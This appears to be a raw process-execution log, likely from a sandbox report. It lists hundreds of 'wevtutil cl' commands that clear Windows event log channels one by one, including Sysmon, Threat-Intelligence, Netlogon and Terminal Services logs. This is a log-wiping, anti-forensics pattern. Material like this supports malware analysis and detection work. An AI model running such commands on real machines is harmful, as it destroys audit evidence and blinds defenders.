"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBServer/Security

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBWitnessClient/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBWitnessClient/Informational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SPB-ClassExtension/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SPB-HIDI2C/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Schannel-Events/Perf

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Sdbus/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Sdbus/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Sdstor/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Search-Core/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Search-ProtocolHandlers/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SearchUI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SearchUI/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SecureAssessment/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-Adminless/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-Audit-Configuration-Client/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-EnterpriseData-FileRevocationManager/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-IdentityListener/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-IdentityStore/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-LessPrivilegedAppContainer/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-Mitigations/KernelMode

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-Mitigations/UserMode

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-Netlogon/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-SPP-UX-GC/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-SPP-UX-GenuineCenter-Logging/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-SPP-UX-Notifications/ActionCenter

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-SPP-UX/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-SPP/Perf

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-UserConsentVerifier/Audit

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-Vault/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SecurityMitigationsBroker/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SecurityMitigationsBroker/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SecurityMitigationsBroker/Perf

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SendTo/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Sens/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Sensors/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Sensors/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Serial-ClassExtension-V2/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Serial-ClassExtension/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ServiceReportingApi/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Services-Svchost/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Services/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Servicing/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SettingSync-Azure/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SettingSync-Azure/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SettingSync-OneDrive/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SettingSync-OneDrive/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SettingSync-OneDrive/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SettingSync/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SettingSync/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SettingSync/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SettingSync/VerboseDebug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Setup/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SetupCl/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SetupPlatform/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SetupQueue/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SetupUGC/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-AppWizCpl/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-AuthUI-Common/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-AuthUI-CredentialProviderUser/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-AuthUI-LogonUI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-ConnectedAccountState/ActionCenter

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-Core/ActionCenter

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-Core/AppDefaults

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-Core/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-Core/LogonTasksChannel

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-Core/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-DefaultPrograms/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-LockScreenContent/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-OpenWith/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-Shwebsvc

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-ZipFolder/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ShellCommon-StartLayoutPopulation/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ShellCommon-StartLayoutPopulation/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shsvcs/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SleepStudy/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SmartCard-Audit/Authentication

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SmartCard-DeviceEnum/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SmartCard-TPM-VCard-Module/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SmartCard-TPM-VCard-Module/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SmartScreen/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SmbClient/Audit

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SmbClient/Connectivity

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SmbClient/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SmbClient/Security

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Speech-UserExperience/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Spell-Checking/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SpellChecker/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Spellchecking-Host/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SruMon/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SrumTelemetry

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StateRepository/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StateRepository/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StateRepository/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StateRepository/Restricted

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StorDiag/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StorPort/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-ATAPort/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-ATAPort/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-ATAPort/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-ATAPort/Diagnose

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-ATAPort/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-ClassPnP/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-ClassPnP/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-ClassPnP/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-ClassPnP/Diagnose

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-ClassPnP/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-Disk/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-Disk/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-Disk/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-Disk/Diagnose

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-Disk/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-Storport/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-Storport/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-Storport/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-Storport/Diagnose

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-Storport/Health

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-Storport/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-Tiering-IoHeat/Heat

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-Tiering/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StorageManagement/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StorageManagement/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StorageSettings/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StorageSpaces-Driver/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StorageSpaces-Driver/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StorageSpaces-Driver/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StorageSpaces-ManagementAgent/WHC

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StorageSpaces-SpaceManager/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StorageSpaces-SpaceManager/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Store/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storsvc/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Subsys-Csr/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Subsys-SMSS/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Superfetch/Main

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Superfetch/PfApLog

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Superfetch/StoreLog

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Sysmon/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Sysprep/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-System-Profile-HardwareId/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SystemSettingsHandlers/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SystemSettingsThreshold/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SystemSettingsThreshold/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SystemSettingsThreshold/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TCPIP/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TCPIP/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TSF-msctf/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TSF-msctf/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TSF-msutb/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TSF-msutb/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TTS/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TWinAPI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TWinUI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TWinUI/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TZSync/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TZSync/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TZUtil/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TaskScheduler/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TaskScheduler/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TaskScheduler/Maintenance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TaskScheduler/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TaskbarCPL/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-LocalSessionManager/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-LocalSessionManager/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-LocalSessionManager/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-MediaRedirection/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-PnPDevices/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-PnPDevices/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-PnPDevices/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-PnPDevices/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-Printers/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-Printers/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-Printers/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-Printers/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RDPClient/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RDPClient/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RDPClient/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Tethering-Manager/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Tethering-Station/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ThemeCPL/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ThemeUI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Threat-Intelligence/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Time-Service-PTP-Provider/PTP-Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Time-Service/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Troubleshooting-Recommended/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Troubleshooting-Recommended/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TunnelDriver

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UAC-FileVirtualization/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UAC/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UI-Shell/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UIAnimation/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UIAutomationCore/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UIAutomationCore/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UIAutomationCore/Perf

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UIRibbon/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-USB-MAUSBHOST-Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-USB-UCX-Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-USB-USBHUB/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-USB-USBHUB3-Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-USB-USBPORT/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-USB-USBXHCI-Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-USB-USBXHCI-Trustlet-Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UniversalTelemetryClient/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-User Control Panel Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

